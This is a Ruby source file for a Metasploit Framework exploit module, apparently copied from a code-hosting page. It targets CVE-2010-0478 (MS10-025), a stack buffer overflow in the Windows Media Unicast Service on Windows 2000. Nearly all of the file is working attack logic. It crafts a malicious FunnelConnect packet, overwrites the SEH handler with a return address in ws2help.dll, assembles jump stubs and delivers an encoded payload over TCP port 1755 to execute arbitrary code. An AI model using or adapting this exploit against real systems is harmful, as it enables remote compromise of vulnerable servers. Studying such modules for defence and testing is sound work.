208 lines
No EOL
5.3 KiB
Ruby
Executable file
208 lines
No EOL
5.3 KiB
Ruby
Executable file
##
|
|
# $Id: ms10_025_wmss_connect_funnel.rb 9166 2010-04-28 00:48:00Z jduck $
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GreatRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::Remote::Seh
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Windows Media Services ConnectFunnel Stack Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack buffer overflow in the Windows Media
|
|
Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially
|
|
crafted FunnelConnect request, an attacker can execute arbitrary code
|
|
under the "NetShowServices" user account. Windows Media Services 4.1 ships
|
|
with Windows 2000 Server, but is not installed by default.
|
|
|
|
NOTE: This service does NOT restart automatically. Successful, as well as
|
|
unsuccessful exploitation attempts will kill the service which prevents
|
|
additional attempts.
|
|
},
|
|
'Author' => 'jduck',
|
|
'License' => MSF_LICENSE,
|
|
'Version' => '$Revision: 9166 $',
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2010-0478' ],
|
|
[ 'OSVDB', '63726' ],
|
|
[ 'MSB', 'MS10-025' ],
|
|
[ 'URL', 'https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 600,
|
|
'BadChars' => "\x00\x5c",
|
|
'StackAdjustment' => -3500,
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Windows 2000 Pro SP4 English',
|
|
{
|
|
# Unpatched:
|
|
# SEH handler offset is 840
|
|
# Stack return is at 652
|
|
# "Patched":
|
|
# SEH handler offset is 832
|
|
'Offset' => 840,
|
|
'SEHOffsets' => [ 832, 840 ],
|
|
'EIPOffset' => 652+3,
|
|
'Ret' => 0x75022ac4 # p/p/r in ws2help.dll
|
|
}
|
|
],
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Apr 13 2010',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(1755)
|
|
], self.class)
|
|
end
|
|
|
|
def exploit
|
|
@pkts = 0
|
|
cmd_buf = ''
|
|
|
|
# LinkViewerToMacConnect
|
|
subscriber = "NSPlayer/4.1.0.3928; {68c0a090-8797-11d2-a2b3-00a0c9b60551}"
|
|
#subscriber = "NSPlayer/7.0.0.1956; {}; Host: The.Host.Net"
|
|
#subscriber = "Spooooon!"
|
|
subscriber << "\x00"
|
|
subscriber = Rex::Text.to_unicode(subscriber)
|
|
cmd_buf << make_command(0x30001, subscriber)
|
|
|
|
# LinkViewerToMacConnectFunnel
|
|
name = ''
|
|
name << "\\\\"
|
|
name << rand_text((target['Offset'] + 4 + 5) / 2)
|
|
name << "\\"
|
|
name << "\x00"
|
|
|
|
# Convert it to Unicode..
|
|
name = Rex::Text.to_unicode(name)
|
|
stuff = Rex::Text.pattern_create((target['Offset'] + 4 + 5) + 4)
|
|
stuff.slice!(0,4)
|
|
name[4,stuff.length] = stuff
|
|
|
|
# Insert the payload..
|
|
name[4,payload.encoded.length] = payload.encoded
|
|
|
|
# Build the SEH frame that leads to the payload...
|
|
target['SEHOffsets'].each { |off|
|
|
seh = ''
|
|
case off
|
|
when 832
|
|
code = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-652").encode_string
|
|
code << rand_text(8 - code.length)
|
|
name[off-8,code.length] = code
|
|
seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-8").encode_string
|
|
seh << rand_text(2)
|
|
seh << [target.ret].pack('V')
|
|
when 840
|
|
seh << generate_seh_record(target.ret)
|
|
asm = "add edi, 0x04\njmp edi"
|
|
seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
|
|
end
|
|
name[off,seh.length] = seh
|
|
}
|
|
|
|
# Make sure the return address points at an invalid address
|
|
off = target['EIPOffset']
|
|
name[off,1] = [0x80 + rand(0x7f)].pack('C')
|
|
|
|
# Add it to the command buffer..
|
|
cmd_buf << make_command(0x30002, name)
|
|
|
|
# Build the TcpMessageHeader ..
|
|
pkt = make_tcpmsghdr(cmd_buf)
|
|
|
|
# Handle the transacation..
|
|
connect
|
|
print_status("Sending crafy commands (#{pkt.length} bytes) ...")
|
|
sock.put(pkt)
|
|
|
|
handler
|
|
disconnect
|
|
end
|
|
|
|
|
|
#
|
|
# Create a TcpMessageHeader from the supplied data
|
|
#
|
|
def make_tcpmsghdr(data)
|
|
len = data.length
|
|
# The server doesn't like packets that are bigger...
|
|
raise RuntimeError, 'Length too big' if (len > 0x1000)
|
|
len /= 8
|
|
|
|
# Pack the pieces in ...
|
|
pkt = [
|
|
1,0,0,0, # rep, ver, verMinor, pad
|
|
0xb00bface, # session id (nice)
|
|
data.length + 16, # msg len
|
|
0x20534d4d, # seal ("MMS ")
|
|
len + 2, # chunkCount
|
|
@pkts, 0, # seq, MBZ
|
|
rand(0xffffffff),rand(0xffffffff) # timeSent -- w/e
|
|
].pack('CCCCVVVVvvVV')
|
|
|
|
# Add the data
|
|
pkt << data
|
|
|
|
# Pad it to 8 bytes...
|
|
left = data.length % 8
|
|
pkt << ("\x00" * (8 - left)) if (left > 0)
|
|
|
|
pkt
|
|
end
|
|
|
|
|
|
#
|
|
# Create a command packet
|
|
#
|
|
def make_command(msg_id, extra)
|
|
# Two opcodes, get handled differently..
|
|
case msg_id
|
|
when 0x30001
|
|
data = [0xf0f0f0f0,0x0004000b,0x0003001c].pack('VVV')
|
|
|
|
when 0x30002
|
|
data = [0xf0f0f0f1,0xffffffff,0,0x989680,0x00000002].pack('VVVVV')
|
|
|
|
end
|
|
|
|
# Put some data on...
|
|
data << extra
|
|
|
|
# Pad it to 8 bytes...
|
|
left = data.length % 8
|
|
data << ("\x00" * (8 - left)) if (left > 0)
|
|
|
|
# Combine the pieces..
|
|
pkt = [
|
|
(data.length / 8) + 1, # chunkLen
|
|
msg_id # msg ID
|
|
].pack('VV')
|
|
pkt << data
|
|
|
|
pkt
|
|
end
|
|
|
|
end |